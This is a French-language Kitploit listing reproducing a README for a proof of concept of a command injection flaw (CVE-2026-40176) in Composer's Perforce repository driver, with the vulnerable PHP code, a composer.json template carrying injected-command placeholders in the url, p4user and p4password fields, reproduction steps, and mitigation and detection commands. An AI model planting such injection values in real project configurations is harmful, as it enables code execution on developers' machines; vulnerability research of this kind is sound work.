Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2026-40176-cve-2026-40261 — Preuve de concept démontrant une injection de commande dans le pilote Perforce de Composer (CVE-2026-40176), permettant l'exécution de code à distance via une configuration de dépôt malveillante. | Kitploit
Outils/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleDéveloppement de Charges Utiles
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

Preuve de concept démontrant une injection de commande dans le pilote Perforce de Composer (CVE-2026-40176), permettant l'exécution de code à distance via une configuration de dépôt malveillante.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-40176

Exécution de code à distance (RCE) dans le dépôt Perforce de Composer

Composer Version Severity Type


📋 Résumé

Vulnérabilité d'injection de commandes dans le pilote de dépôt Perforce de Composer permettant l'exécution de code à distance (RCE) via une validation insuffisante des entrées dans le traitement des URL de dépôt.


🎯 Détails de la vulnérabilité

PropriétéValeur
ID CVECVE-2026-40176
Versions affectéesComposer < 2.2.27
Type de vulnérabilitéInjection de commandes
Vecteur d'attaqueConfiguration de dépôt malveillante
ImpactExécution de code arbitraire
Score CVSSÉlevé/Critique

🔍 Description technique

La vulnérabilité existe dans la façon dont Composer traite les dépôts de type perforce. Le paramètre n'est pas correctement assaini avant d'être transmis aux commandes shell, ce qui permet aux attaquants d'injecter des commandes système arbitraires.

root@kitploit:~

    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

Tout cela n'était pas correctement échappé, permettant à un attaquant d'injecter des commandes en créant une charge utile malveillante pour tous les champs avec le type perforce.

Modèle de code vulnérable :

root@kitploit:~
{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 Preuve de concept

Ce dépôt contient une preuve de concept fonctionnelle démontrant la vulnérabilité.

Structure du projet

root@kitploit:~
CVE-2026-40176/
├── composer.json              # Configuration de dépôt Perforce malveillante
├── vuln-composer.phar         # Composer 2.2.26 (VULNÉRABLE)
├── patched-composer.phar      # Composer 2.2.27 (CORRIGÉ)
└── README.md                  # Ce fichier

Étapes de reproduction

1. Cloner le dépôt

root@kitploit:~
git clone <repository-url>
cd CVE-2026-40176

2. Vérifier les versions de Composer

root@kitploit:~
php vuln-composer.phar --version
# Sortie : Composer version 2.2.26

php patched-composer.phar --version
# Sortie : Composer version 2.2.27

3. Tester la version vulnérable

root@kitploit:~
php vuln-composer.phar install
# OU
php vuln-composer.phar update

4. Vérifier l'exploitation

root@kitploit:~
ls -la /tmp/pwned

5. Tester la version corrigée (devrait échouer)

root@kitploit:~
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# Le fichier ne devrait PAS exister (la vulnérabilité est corrigée)

🛡️ Atténuation

Actions immédiates

  1. Mettre à niveau Composer vers la version 2.2.27 ou ultérieure :

    root@kitploit:~
    composer self-update --2.2.27
    # OU
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. Examiner tous les fichiers composer.json pour détecter des configurations de dépôt inconnues ou suspectes

  3. Auditer la chaîne d'approvisionnement - Vérifier si des dépendances référencent des dépôts non fiables

Détection

root@kitploit:~
# Vérifier votre version de Composer
composer --version

# Rechercher des dépôts Perforce dans vos projets
grep -r "perforce" */composer.json
Télécharger l’outil